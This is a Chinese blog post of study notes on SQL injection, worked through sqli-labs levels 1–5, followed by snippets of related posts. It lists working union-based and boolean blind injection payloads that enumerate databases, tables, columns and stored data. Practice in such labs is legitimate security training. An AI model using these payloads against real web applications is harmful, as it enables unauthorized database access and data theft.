sql注入——day01

最新推荐文章于 2024-08-05 17:22:13 发布
最新推荐文章于 2024-08-05 17:22:13 发布
阅读量186 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_40739219/article/details/120654427

基本的


查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where 
table_schema = '数据库名'
查列:select column_name from information_schema.columns where
table_name='表名'
查字段:select 字段名 form 数据库.表名

记得加注释符-- +

sqli_labs 1


1 ?id=1'用单引号或and,or测试注入点,显示sql错误则可以注入。
2 确定注入点后用order by确定列数,超出列数会报错。
3 union select 1,2,3确定回显位。前半段语句必须为假。
4 确定回显位后开始查询想要的数据,将要查的数据替换回显位。
5 union select 1,2,schema_name from information_schema.schemata
//显示查的库,但是只能显示第一个,一个一个看的话用limit 1,1控制偏移量
6 union select 1,2,group_concat(schema_name) from information_schema.schemata
//虽然只能显示一行,但是group_concat()可以将该查询到的结果拼接在一起,一行就全展示完。
7 //找出库后找表
  union select 1,2,group_concat(table_name) from information_schema.tables 
  where table_schema = '数据库名' //涉及单引号的字符串,建议直接前加0x再将其转化为16进制
8 //找出表后查字段
  union select 1,2,group_concat(column_name) from information_schema.columns 
  where table_name = '表名'
9 //找出字段后取数据
  union select 1,2,group_concat(字段名) from 数据库名.表名
  //如果回显位有限可以用concat_ws('~',字段A,字段B) 显示效果 字段A~字段B
  union select 1,2,group_concat(concat_ws('~',字段A,字段B)) from 数据库名.表名
  //用group_concat包裹可以全部显示


sqli_labs 2


第二关只是id变成了数值型,未用单引号包裹,其余步骤和第一关相同 


sqli_labs 3


第三关根据加单引号显示的报错信息确定id是被('')包裹,所以改成?id=1')--+即可其余步骤和第一关相同

sqli_labs 4


第四关与第三关类似用单引号试错未报错,继续用双引号测试根据报错,发现id是被("")包裹
其余步骤和第一关相同

补充知识
1. left()函数:    left(database(),1)='s'          left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0
2. regexp函数:    select user() regexp 'r'    user()的结果是root,regexp为匹配root的正则表达式
3. like函数:      select user() like 'ro%'        匹配与regexp相似。
4. substr(a,b,c)   select substr(a,b,c)            substr(a,b,c)从位置b开始,截取a字符串c位长度
5. ascii()                                                       将某个字符串转化为ascii值  
6. chr(数字)       或者是ord('字母')                使用python中的两个函数可以判断当前的ascii值是多少

对于security数据库:
 select left(database(),1)='s';                                    前1位是否是s
 select database() regexp 's';                                   匹配第一个字符是否是 s
 select database() like 's%';                                      匹配第一个字符是否是 s
 select substr((select database()),1,1)='s';                匹配第一个字符是否是 s
 select substr((select database()),1,3)= 'sec';           匹配前三个个字符是否是 sec
 select ascii(substr((select database()),1,1));            直接回显115  或者是:
 select ascii(substr((select database()),1,1)) > 110;  如果大于110,就会返回1,否则返回0.

sqli_labs 5


页面只返回是和否,典型的布尔盲注,通过补充知识里的函数不断测试来获取信息
1 ?id=1'用单引号判断能否注入
2 还是利用order by确定列数,判断列数不需要回显根据页面返回提示即可确定列数
3 ?id=1' and left((select database()),1)='s'--+开始猜数据库的名字
4 ?id=1’ and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
  //这是第一个数据名字的第一个字符,后续的表名,字段以及数据名均可用这样的方法以及上面的其它函数进行猜解,
  人工猜字符ascii时最好用二分法

SQL注入——渗透day06
qq_62716256的博客
08-12 1109
SQL注入——渗透day06
SQL注入——渗透day07
qq_62716256的博客
09-01 1114
wql注入
一天学会SQL注入
m0_46211662的博客
02-03 457
绪论 结构化查询语言(SQL):是一种特殊编程语言,用于数据库中的标准数据查询语言 SQL注入:是一种常见的WEB安全漏洞 SQL注入漏洞原理: 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构达到编写程序时意料之外结果的攻击行为。其成因可以归结外以下两个原因叠加造成的:(下面两点是漏洞产生的原因) 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。注入点可能存在的位置 根据
sql left()函数
热门推荐
欢迎一起学习交流
09-28 1万+
返回从字符串开始位置指定数量的字符(包含空格)。
详解union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘ ‘--+
m0_51756263的博客
07-10 8863
详解union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Sql注入截取字符串常用函数
Pz_mstr's Blog
08-21 532
原文传送门:http://www.cnblogs.com/lcamry/p/5504374.htm 在sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也称为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串。本文中主要列举三个函数和该函数注入过程中的一些用例。Ps;此处用mysql进行说明,其他类型数据库请自行检测。  转载该文章主要为了自己查阅
mysqlSQL注入截取字符串常用函数mid(),substr(),left()
yusakul的博客
11-24 8294
sql注入中,往往会用到截取字符串的问题,例如不回显的情况下进行的注入,也成为盲注,这种情况下往往需要一个一个字符的去猜解,过程中需要用到截取字符串 mid函数函数为截取字符串一部分。MID(column_name,start[,length]) 参数 描述 column_name 必需。要提取字符的字段。 start 必需。规定开始位置(起始值是 1)。 le...
【小迪安全day12】WEB 漏洞——SQL 注入
RichUee的博客
12-04 1061
WEB 漏洞-SQL 注入在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞是WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。
【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
RichUee的博客
12-05 1529
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
1day CRMEB开源电商系统 products 接口处存在SQL注入
weixin_43167326的博客
06-18 762
CRMEB开源电商系统是遥遥领先的开源电商系统,框架采用Tp6+MySQL+elementUI+uniapp,商城系统可商用;前后台都支持风格切换,包含小程序商城、H5商城、公众号商城、App,支持多语言、分销、拼团、砍价、秒杀、优惠券、积分、抽奖、会员等级、小程序直播、页面DIY,前后端分离,方便二开,使用文档、接口文档、数据字典、代码生成、二开文档/视频教程。
CTF做题总结(二)
qwzf
09-28 1282
前言 最近这段时间做了一些Web题,和最基础的Reverse题。虽说还有两道题没做出来,但还是先总结一下吧! BASE-INJECT 看题目提示,就知道这道题之前做过,不过当时没总结,现在总结一下。 题目的意思是注入。点开题目 发现输入id可以查信息,并且是get传参方式。 判断是否存在sql注入 判断方法在sqlilabs攻关总结中总结过。就不叙述了。这里我选用get单引号判断 输入?id=...
sql注入1-4关实现
lxy9298的博客
08-05 350
爆出库是 ctfshow,ctftraining,information_schema,mysql,performance_schema,security,test。发现本关的闭合方式不同,需要使用?id=1")闭合,然后参考第二关。这关和第一第二关十分相似,所以先输入判断。id=1' 报错 ' .0 '所以判断本关需要闭合?id=1'--+ 正常。id=1'--+ 报错。那么我们继续先输入判断情况。id=1')闭合查看。id=1")闭合查看。爆出列是id,flag。直接参考第二关的闭合。
(一)显错注入
qq_16864631的博客
09-29 837
1-SQL注入-显错注入Rank 1 Tips: 通过注入找到数据库中的Flag吧 Flag格式zKaQ-XXXXXXXX **大概思路: 1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞, 2、通过order by查询到存在多少个字段。 3、通过联合查询来获得回显字段。 4、获取数据库名称以及链接用户名。 5、列出数据库中所有的表. 6、列出目标表中所有的字段 7、列出目标字段中的信息 1、先验证是否可以执行SQL语句来判断是否存在SQL漏洞 地址栏可以看到id=1,那么我放入id=5-4,页面显
布尔盲注
m0_52880296的博客
05-06 4251
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
sql注入总结
wuqiongrj的博客
07-22 7830
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
mysql -- 手工注入
Nixawk
04-22 6546
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
sql注入详解
m0_67392811的博客
06-12 6574
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sqli_labs闯关
weixin_45808483的博客
10-27 561
less-1 http://127.0.0.1/sqli-labs/Less-1/?id=1 // 加单引号,查看是否有注入 http://127.0.0.1/sqli-labs/Less-1/?id=1' //查看有多少列 http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ // 使id=-1报错,使用联合查找查看那些数据可以回显 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union
SQL注入学习记录一
一只菜鸡
02-22 837
前置知识: 1.mysql数据库的一些基本使用:增删改查 2.python脚本的使用 3.了解php中常见的与mysql相关的函数和类 0x01:数据库基础 1.基础操作 查看库名: mysql> show databases; 创建库: mysql> creat database test; 删除库: mysql> drop database test; 使用库: mysql> user test 创建表: mysql> create table test( -> `i
pikachuSQL注入
最新发布
12-29
### 关于Pikachu平台SQL注入的学习 #### SQL注入漏洞原理 SQL注入是一种代码注入技术,攻击者通过向应用程序输入恶意的SQL语句来操纵数据库执行未授权的操作。这种攻击通常发生在Web应用未能正确过滤用户输入的情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值